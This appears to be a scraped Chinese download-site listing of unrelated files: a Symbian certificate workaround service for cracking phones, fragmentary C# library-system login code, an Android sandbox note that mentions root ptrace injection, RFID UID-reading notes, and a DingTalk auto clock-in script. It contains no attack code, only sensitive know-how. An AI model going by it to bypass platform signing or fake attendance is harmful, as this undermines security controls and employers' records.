在这里解释一下:1、原有的证书制作流程是大家提交IMEI号码给我们,我们通过塞班证书官网制作,并传给亲们使用(签名软件安装),所有有此证书制作功能的网站,不管是提供证书下载,还是不提供证书下载的,都是同样的方式。
没有任何区别。
2、目前的证书制作流程有了有巨大的区别,虽然塞班证书官网依然提供开发者证书,但是在IMEI号限制的同时,增加了一个软件所需UID的限制,也就是因为这个限制导致大家无法再使用开发者证书签名软件安装。
3、目前通过我们的努力,已经解决全部机子的证书问题。
(免刷机破解手机)
2024/9/18 9:19:47
1.18MB
1
usingSystem;usingSystem.Collections.Generic;usingSystem.ComponentModel;usingSystem.Data;usingSystem.Drawing;usingSystem.Linq;usingSystem.Text;usingSystem.Windows.Forms;usingSystem.Data.SqlClient;namespace图书管理系统{publicpartialclass登录窗口:Form{//publicstaticstringConnectionString="Server=(local);database=图书管理库;uid=sa;pwd=1234";//sqlserver混合模式//publicstaticstringConnectionString="Server=(local);IntegratedSecurity=SSPI;database=图书管理库";//windows模式publicstringstrSQL;publicSqlConnectionmyConnection;publicSqlCommandBuildersqlCmdBld;publicDataSetds=newDataSet();publicSqlDataAdapterda;publicintnum=0;privateDataTablemyTable;privateDataRowmyRow;publicstaticstringstrUser;publicstaticstringstrPassword;//publicstaticstringstrDepartment;publicstaticboollogin_flag=false;public登录窗口(){InitializeComponent();}privatevoidbutton2_Click(objectsender,EventArgse){Close();}privatevoid登录窗口_Load(objectsender,EventArgse){linkdatabaselink=newlinkdatabase();//实例化myConnection=newSqlConnection(link.connectionstring());//实例化连接strSQL="select*from用户表";da=newSqlDataAdapter(strSQL,myConnection);ds.Clear();da.Fill(ds,"用户表");//////动作myTable=ds.Tables["用户表"];for(inti=0;i<myTable.Rows.Count;i++){comboBox1.Items.Add(myTable.Rows[i]["用户名"].ToString().Trim());}}privatevoidbutton1_Click(objectsender,EventArgse){linkdatabaselink=newlinkdatabase();//实例化myConnection=newSqlConnection(link.connectionstring());//实例化连接strSQL="sele
2024/8/20 10:41:13
7.26MB
1
Android应用程序是运行在一个沙箱中。
这个沙箱是基于Linux内核提供的用户ID(UID)和用户组ID(GID)来实现的。
Android应用程序在安装的过程中,安装服务PackageManagerService会为它们分配一个唯一的UID和GID,以及根据应用程序所申请的权限,赋予其它的GID。
有了这些UID和GID之后,应用程序就只能限访问特定的文件,一般就是只能访问自己创建的文件。
此外,Android应用程序在调用敏感的API时,系统检查它在安装的时候会没有申请相应的权限。
如果没有申请的话,那么访问也会被拒绝。
对于有root权限的应用程序,则不受上述沙箱限制。
此外,有root权限的应用程序,还可以通过Linux的ptrace注入到其它应用程序进程,以及系统进程,进行各种函数调用拦截。
这个沙箱是基于Linux内核提供的用户ID(UID)和用户组ID(GID)来实现的。
Android应用程序在安装的过程中,安装服务PackageManagerService会为它们分配一个唯一的UID和GID,以及根据应用程序所申请的权限,赋予其它的GID。
有了这些UID和GID之后,应用程序就只能限访问特定的文件,一般就是只能访问自己创建的文件。
此外,Android应用程序在调用敏感的API时,系统检查它在安装的时候会没有申请相应的权限。
如果没有申请的话,那么访问也会被拒绝。
对于有root权限的应用程序,则不受上述沙箱限制。
此外,有root权限的应用程序,还可以通过Linux的ptrace注入到其它应用程序进程,以及系统进程,进行各种函数调用拦截。
2024/7/6 13:13:28
2.53MB
1
NXP公司MIFAREClassic/UltraLight标准的的RFID卡,4字节7字节10字节UID定义与读取,在RC663芯片上验证过。
相关RFID、NFC开发或技术交流可联系上海匀逸物联(www.yunyi.link)
相关RFID、NFC开发或技术交流可联系上海匀逸物联(www.yunyi.link)
2024/6/26 15:28:22
213KB
1
NXP公司的RFID卡——NTAG213、215、216,属于MifareUltraLight7字节UID卡,使用ISO-14443A协议通信,无密码认证。
RC663芯片验证过程序,RFID开发或技术交流请联系上海匀逸物联(www.yunyi.link)
RC663芯片验证过程序,RFID开发或技术交流请联系上海匀逸物联(www.yunyi.link)
2024/6/18 4:31:46
1.58MB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB